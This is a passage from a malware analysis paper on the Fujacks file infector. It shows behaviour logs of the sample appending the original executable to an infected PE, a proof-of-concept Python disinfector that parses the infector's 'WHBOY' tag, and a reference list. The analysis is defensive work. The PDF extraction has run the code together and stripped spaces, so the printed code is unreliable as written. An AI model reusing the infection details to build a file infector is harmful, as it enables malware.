AllocationSize:4,096,EndOfFile:766,NumberOfLinks:1,DeletePending:False,Directory:False
ncscv32.exe ReadFile C:\DocumentsandSettings\***\LocalSettings\Temp\94$$.Ico
Offset:0,Length:766
ncscv32.exe QueryStandardInformationFile
C:\DocumentsandSettings\***\LocalSettings\Temp\94$$.Ico
AllocationSize:4,096,EndOfFile:766,NumberOfLinks:1,DeletePending:False,Directory:False
ncscv32.exe CloseFile C:\DocumentsandSettings\***\LocalSettings\Temp\94$$.Ico
Artifact11:TemporaryIconfileisusedtopreserveoriginalPEIcon
ProcessName Operation Target Detail
ncscv32.exe CreateFile C:\cygwin\bin\run.exe DesiredAccess:GenericRead/Write,Disposition:Open,Options:SynchronousIONon-Alert,Non-DirectoryFile,Attributes:N,ShareMode:Read,AllocationSize:n/a,OpenResult:Opened
ncscv32.exe QueryStandardInformationFile
C:\cygwin\bin\run.exe AllocationSize:69,632,EndOfFile:68,938,NumberOfLinks:1,DeletePending:False,Directory:False
ncscv32.exe ReadFile C:\cygwin\bin\run.exe Offset:68,810,Length:128
ncscv32.exe WriteFile C:\cygwin\bin\run.exe Offset:68,938,Length:128
ncscv32.exe WriteFile C:\cygwin\bin\run.exe Offset:118,986,Length:128
ncscv32.exe WriteFile C:\cygwin\bin\run.exe Offset:119,114,Length:24
**(
)representsrepeatingoperationsArtifact12:OriginalPE(run.exe)isappendtonewinfectedPE
-
8/6/2019 Fujacks a Modern File Infector
19/20
FUJACKS:AMODERNFILEINFECTOR
JoelYonts/MaliciousStreams
AppendixB:SampleFujacksPEDisinfector
##############################################################################
# cleanFile
# - Proof-of-Concept Python function for cleaning a Fujacks infected PE
# - Function lacks necessary error checking and logging
#
def cleanFile ( infectedFile ):MAX_FJ_TAG_SIZE=256
# Open Infected File
infectedFP =open(infectedFile, "r")
# Read End of File
infectedFP.seek(-(MAX_FJ_TAG_SIZE), os.SEEK_END)fileChunk=infectedFP.read(MAX_FJ_TAG_SIZE)
# Search for Fujacks Tag
# Format of Tag: WHBOY.exe..
fjTagRE="WHBOY(.*\.exe)\.exe.([0-9]*)."fjTagPattern= re.compile(fjTagRE)
mobj =fjTagPattern.search(fileChunk)
# Parse Fujacks Tag
fjTagLoc = MAX_FJ_TAG_SIZE-mobj.start()fnameOrigPE=mobj.group(1)sizeOrgPE=int(mobj.group(2))
# Write Clean PE
locOrigPE=fjTagLoc+sizeOrgPE+1infectedFP.seek(-(locOrigPE), os.SEEK_END)
tmpFd, cleanFile = tempfile.mkstemp(suffix=".clean", text=False, dir=".")os.write(tmpFd, infectedFP.read(sizeOrgPE))
infectedFP.close()os.close(tmpFd)
# Restore Original PE
os.rename(infectedFile, infectedFile+".infected")os.rename(cleanFile, fnameOrigPE)
AppendixB:Proof-of-conceptPythonfunctionforcleaningaFujacksinfectedPE
-
8/6/2019 Fujacks a Modern File Infector
20/20
FUJACKS:AMODERNFILEINFECTOR
Joel Yonts / Malicious Streams
References
Quist,D.(2008,December).Offensivecomputing.Retrievedfromhttp://www.offensivecomputing.netSkoudis,E.,&Zeltser,L.(2004).Malware:FightingMaliciousCode.(M.Franz,Ed.)UpperSaddleRiver,NJ:PrenticeHall.
Szor,P.(2005).TheArtofComputerVirusResearchandDefense.(K.Gettman,J.Goldstein,G.Kanouse,K.Hart,&C.Andry,Eds.)UpperSaddleRiver,NJ:PearsonEducation,Inc.
Zeltser,L.(2010).Reverse-engineeringmalware:malwareanalysistoolsandtechniques.ProceedingsoftheSANSconference
top related